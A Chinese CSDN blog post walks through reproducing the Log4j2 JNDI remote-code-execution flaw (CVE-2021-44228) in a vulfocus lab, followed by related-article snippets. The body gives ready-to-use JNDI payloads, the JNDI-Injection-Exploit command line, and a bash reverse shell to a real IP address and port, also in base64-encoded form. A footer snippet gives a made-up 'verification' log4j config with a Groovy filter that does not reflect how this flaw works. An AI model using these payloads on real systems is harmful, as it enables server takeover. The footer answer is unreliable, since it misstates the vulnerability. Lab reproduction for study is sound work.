log4j2-rce漏洞复现(CVE-2021-44228)

最新推荐文章于 2024-06-03 15:52:37 发布
最新推荐文章于 2024-06-03 15:52:37 发布
阅读量2.1k 收藏 4
点赞数 1
文章标签: log4j2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_l123/article/details/123896465
版权

漏洞介绍

Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。

影响版本:Apache Log4j2 2.0-beta9 - 2.15.0(不包括安全版本 2.12.2、2.12.3 和 2.3.1)

漏洞编号:CVE-2021-44228

漏洞复现

利用vulfocus搭建并启动靶场

DNSLog验证

通过DNSLog Platform平台获取到域名skvgq7.dnslog.cn,构造payload:${jndi:ldap://skvgq7.dnslog.cn},浏览器点击???并使用Burpsuite抓包,替换payload参数,此时发包会导致服务器400错误

通过Burpsuite自带的编码工具对其进行URL编码

编码后再次发送发送请求包

在DNSLog网站成功接收到解析记录

JNDI注入反弹shell

使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar进行漏洞利用

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

使用方式

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

反弹shell指令

bash -i >& /dev/tcp/ip/port 0>&1

此处的ip为47.106.102.84,port可使用任意未被占用的端口,此处指定为4444

bash -i >& /dev/tcp/47.106.102.84/4444 0>&1

将此条命令进行base64编码

YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDYuMTAyLjg0LzQ0NDQgMD4mMQ==

编码后的命令通过-C参数输入JNDI工具,通过通过-A参数指定的ip地址

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDYuMTAyLjg0LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 47.106.102.84 

在新的窗口监听4444端口

 

替换工具生成的payload:rmi://47.106.102.84 :1099/of6rlz 到Burpsuite:

编码后发送到靶机:

监听窗口成功接收到反弹的shell:

 

Z_l123
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
vulfocus/log4j2-rce-2021-12-09:latest通关
qq_44122254的博客
12-28 5133
别的大佬在漏洞出来后立马复现利用都学明白了,我这个菜鸟开始了 搜到了在vulfocus.fofa.io靶场有更新了,就在这里开始了学习 启动靶场 按照官方说的漏洞位置在/hello,漏洞变量是payload 按照官方说的在hello里面访问hello 查看漏洞是否存在,当然啦,这是靶场怎么会不存在呢,哈哈哈 证明漏洞存在的方式: dnslog地址 构造payload 执行之后看一下这边的解析记录,存在此漏洞 好了,继续靶场复现 漏洞存在后,进行反弹shell,进一步利用,这里用到了一个工具**JND
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
log4j2 rce (CVE-2021-44228)
weixin_40151476的博客
03-01 878
Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。
Web网络安全-----Log4j高危漏洞原理及修复_log4j漏洞是什么
weixin_42340783的博客
06-03 1026
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。
CVE-2021-44228——Log4j2-RCE漏洞复现
Li-D的博客
06-10 1786
Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞
vulfocus Apache log4j2-RCE 漏洞复现CVE-2021-44228
qq_45780190的博客
12-15 5009
根据提示,漏洞存在于http://xxxxx/hello的payload参数中,并以post的方式传参,因此我们可以利用hackerbar进行漏洞验证 创建靶场后是这样一个页面。 使用payload验证,发现可以触发dnslog,可以确认可以利用 证明存在JNDI注入漏洞。 在这里我们需要用到JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar来生成payload,建立1389和8080端口的服务。用于远程命令执行使靶机来访问我准备好的EXP从而进行更安全的被动连接,
漏洞复现——log4j2-rceCVE-2021-44228
小林说安全的博客
05-29 1998
漏洞复现——log4j2-rceCVE-2021-44228
CVE-2021-44228——Vulfocus-Log4j RCE漏洞复现
热门推荐
LiBai'S BLOG
01-05 2万+
这里写目录标题VuofocusDnslog出网测试JNDI注入反弹shell Vuofocus http://vulfocus.fofa.so/ 启动靶场 Dnslog出网测试 http://www.dnslog.cn/ payload GET方式提交 payload payload=${jndi:ldap://X.X.X.X/exp} payload=${jndi:ldap://5e0s0v.dnslog.cn/exp} 用payload打的时候发现服务器返回404 原因是因为GET数据传输
【vulhub】Log4j2CVE-2021-44228漏洞复现
weixin_49422491的博客
09-13 2833
【vulhub】Log4j2CVE-2021-44228漏洞复现
Apache Log4j2 RCE漏洞复现(CVE-2021-44228)
siu~
10-31 480
Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过 该漏洞构造特殊的数据请求包,最终触发远程代码执行。
CVE-2021-44228)Apache_Log4j2_RCE漏洞复现(反弹shell教学)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
01-10 7274
Log4j2 组件在处理程序日志记录时存在JNDI 注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2 组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。本文是log4j2漏洞复现以及利用该漏洞进行命令执行RCE,反弹shell。
log4j2-rce靶场.zip
01-16
在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与...
Log4j2 RCE漏洞分析
03-14
记录一下log4j2 RCE的原理
logging-log4j2-log4j-2.16.0-rc1.zip
12-13
2021年12月初,Log4j中的一个名为CVE-2021-44228的严重漏洞被公开,这被称为"Log4Shell"漏洞。它源于Log4j的JNDI(Java Naming and Directory Interface)查找功能,当恶意用户在日志记录中插入特定的字符串时,...
apache-log4j-2.16.0-bin.rar
12-17
然而,2021年底,一个严重漏洞被发现,被称为“Log4Shell”或CVE-2021-44228,这个漏洞允许攻击者通过在日志记录中注入恶意代码,实现远程代码执行(RCE),对受影响的系统造成严重威胁。 该漏洞源于Log4j2的一个...
yolo-fastest.zip
07-28
yolo-fastest
mysql安装配置教程.pdf
最新发布
07-28
MySQL的安装配置教程可以细分为以下几个步骤,这里以Windows系统为例进行说明: 一、下载MySQL 1.访问MySQL官网: 1.前往MySQL的官方网站(https://www.mysql.com/)下载MySQL Community Server。 2.选择下载版本: 1.在官网的Downloads页面,选择“MySQL Community (GPL) Downloads”下的“MySQL Installer for Windows”。 2.跳过注册步骤,直接下载MySQL安装包。 二、安装MySQL 1.运行安装包: 1.找到下载好的MySQL安装包文件,双击运行。 2.选择安装类型: 1.在安装向导中,选择安装类型(通常建议选择“Custom”进行自定义安装)。 2.选择操作系统的位数(如64位),并勾选“Enable the Select Features...”等选项(如果提示缺少运行库,需要先安装相应的VC_redist)。 3.设置安装路径: 1.选择MySQL的安装路径和数据存储路径,建议将MySQL安装在非系统盘(如D盘)以避免潜在的问题。 4.设置密码:
基于transformers+pytorch实现非结构化商业文本信息中隐私信息识别python源码(比赛获奖项目).zip
07-28
基于transformers+pytorch实现非结构化商业文本信息中隐私信息识别python源码(比赛获奖项目).zip CCF大数据与计算智能大赛-非结构化商业文本信息中隐私信息识别方案 bert base + flat + crf + fgm + swa + pu learning策略 + clue数据集 = test1单模0.906 词向量:https://github.com/Embedding/Chinese-Word-Vectors SGNS(Mixed-large 综合) loss mask相关代码为pu learning策略的实现 主要模块版本 python 3.6.9 torch 1.1.0 transformers 3.0.2 pytorchcrf 1.2.0 torchcontrib 0.0.2 主要功能点 使用BERT base作为基础模型 采用flat结构进行命名实体识别 使用CRF层进行序列标注 采用对抗训练(FGM)和平滑权重平均(SWA)策略提高模型泛化能力 使用PU learning策略处理标注不全的数据 利用clue数据集进行训练
Apache Log4j2 Remote Code Execution (CVE-2021-44228)如何验证
06-06
Apache Log4j2 远程代码执行漏洞CVE-2021-44228)可以通过以下步骤进行验证: 1. 构造一个恶意的日志信息,包含以下内容: ``` <appender name="RCE" class="org.apache.log4j.ConsoleAppender"> <param name="Target" value="System.out"/> <param name="immediateFlush" value="true"/> <layout class="org.apache.logging.log4j.core.layout.PatternLayout"> <param name="ConversionPattern" value="%d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %-5level %logger{36}:%line - %msg%n"/> </layout> <filter class="org.apache.logging.log4j.core.filter.AbstractFilterable"> <filter class="org.apache.logging.log4j.core.filter.GroovyFilter"> <param name="script" value="new java.lang.ProcessBuilder(['calc']).start()"/> </filter> </filter> </appender> <root level="info"> <appender-ref ref="RCE"/> </root> ``` 2. 将恶意日志信息发送到漏洞受影响的 Log4j2 服务端,例如通过网络或者文件系统等方式。 3. 如果服务端受到影响,则会执行恶意脚本,例如在 Windows 上弹出计算器。 请注意,验证漏洞时需要遵守法律法规和道德准则,不得对未授权的系统进行测试。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值